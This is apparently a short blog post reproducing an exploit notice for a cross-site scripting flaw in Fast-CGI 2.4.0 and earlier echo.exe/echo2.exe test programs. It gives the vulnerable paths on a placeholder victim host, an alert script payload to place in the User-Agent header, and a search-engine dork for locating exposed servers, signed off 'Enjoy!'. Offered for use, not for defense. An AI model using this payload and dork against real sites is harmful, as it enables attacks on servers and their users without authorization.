This happens because, there isn't a data validation, when the application is printing the data.
Exploit:
##################################################
Fast-Cgi <=2.4.0 echo.exe/echo2.exe XSS
##################################################
echo.exe : http://[victim]/fcgi-bin/echo.exe
echo2.exe : http://[victim]/fcgi-bin/echo2.exe
Change the User-Agent to:
User-Agent: [XSS]
ex:
User-Agent: <script>alert("XSS");</script>
Dork: inurl:/fcgi-bin/echo
##################################################
by Juza, iamjuza [at] gmail.com
##################################################
Enjoy!
No comments:
Post a Comment